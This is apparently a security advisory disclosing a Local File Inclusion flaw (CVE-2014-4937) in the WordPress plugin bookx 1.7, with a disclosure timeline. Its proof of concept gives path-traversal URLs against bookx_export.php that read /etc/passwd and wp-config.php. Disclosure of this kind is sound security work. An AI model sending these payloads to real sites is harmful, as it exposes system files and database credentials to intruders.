wp-plugin : bookx – Local File Inclusion

 

Plugin Details

 

Plugin Name : bookx

 

Effected Version : 1.7 (and most probably lower version's if any)

 
Vulnerability : Local File Inclusion
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://localhost/wp-content/plugins/bookx/includes/bookx_export.php?file=../../../../../../../../etc/passwd

http://localhost/wp-content/plugins/bookx/includes/bookx_export.php?file=../../../../wp-config.php

Vulerable Parameter : file

 

Disclosure Timeline

 

Vendor Contacted : 2014-02-19

 
Plugin Status : Closed
 
Public Disclosure : May 28, 2014
 
CVE Number : CVE-2014-4937

 
Plugin Description :
 
BookX creates an easy way to give your site visitors a peek at your recommended books.  Using only ISBN numbers, it gets the
information from Barnes and Noble (http://www.bn.com) and stores the information locally to both speed up the response time, but
also to not bog down their servers with repetetive requests.  BookX creates a widget for your sidebar, a list view, and detail view,
all customizable from the easy to use admin interface.

Leave a Reply

Your email address will not be published. Required fields are marked *